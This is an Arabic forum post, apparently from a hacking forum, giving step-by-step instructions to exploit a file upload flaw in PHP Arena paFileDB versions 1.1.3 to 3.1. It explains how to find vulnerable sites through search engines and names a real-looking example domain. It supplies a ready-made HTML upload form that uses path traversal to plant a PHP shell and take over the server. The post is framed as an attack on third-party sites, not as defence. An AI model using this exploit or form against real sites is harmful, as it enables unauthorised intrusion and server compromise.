بسم الله الرحمن الرحيم شرح ثغرة PHP Arena paFileDB وأستغلالها. ============ الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على الموقع وأختراق السيرفر بالكامل. ============ (البرامج المصابه) PHP Arena paFileDB 1.1.3 PHP Arena paFileDB 2.1.1 PHP Arena paFileDB 3.0 Beta 3.1 PHP Arena paFileDB 3.0 PHP Arena paFileDB 3.1 ============ أذهب إلى أي محرك بحث منثل جوجل وأكتب أيا من البرامج السابقة مثلا: PHP Arena paFileDB 3.1 راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال: http://www.truez.com/download نضيف عليه هالوصلة: includes/team/file.php ليصبح: http://www.truez.com/download/includes/team/file.php الأن ضع اللنك في المتصفح وأضغط أنتر: إذا طلع لك هكذا [ ] - [ ] - [ ] يعني الموقع مصاب بالثغرة. الأن لرفع ملف إلى الموقع نتبع الخطوات التالية: 1- نعمل مجلد على القرص C: ونسميه مثلا: Virus 2- الأن نضع بداخله الملف المراد نقله على الموقع ونسميه مثلا 777.php 3- الأن ننسخ هذا الكود ونضعه بملف txt ثم عند الحفظ نسميه Virus.html: ====================== <html><body> <form ENCTYPE="multipart/form-data" method="POST" action="http://www.truez.com/download/includes/team/file.php"> <input name="userfile" TYPE="file"><br> <input name="userfile_name" TYPE="text" value="../../../uploads/777.php"><br> <input type="hidden" name="action" value="team"> <input type="hidden" name="tm" value="file"> <input type="hidden" name="file" value="upload"> <input type="hidden" name="upload" value="do"> <input type=submit name=submit value="doit"> </form> </body></html> ====================== مع مراعاة تغيير: http://www.truez.com/download/includes/team/file.php إلى الموقع المصاب. و 777.php إلى إسم الملف (أتركه كما هو لأنه نحن غيرنا أسمه إلى (777 4- الأن أفتح الصفحة بالمستعرض Internet Explorer وفي الفراغ الأول أختار الملف 777.php الذي كنا نريد ترفيعه ثم أضغط على doit عندها سينتقل الملف إلى الموقع عن طريق الثغرة. ويمكننا أستعراضه من هذا اللنك: http://www.truez.com/download/uploads/777.php
لا تـــغــزي الا بـقـوم قـد غـزت وألا خــلـيــ الـمـغــازيــ لــهــلــهــا
قوانين المنتدى
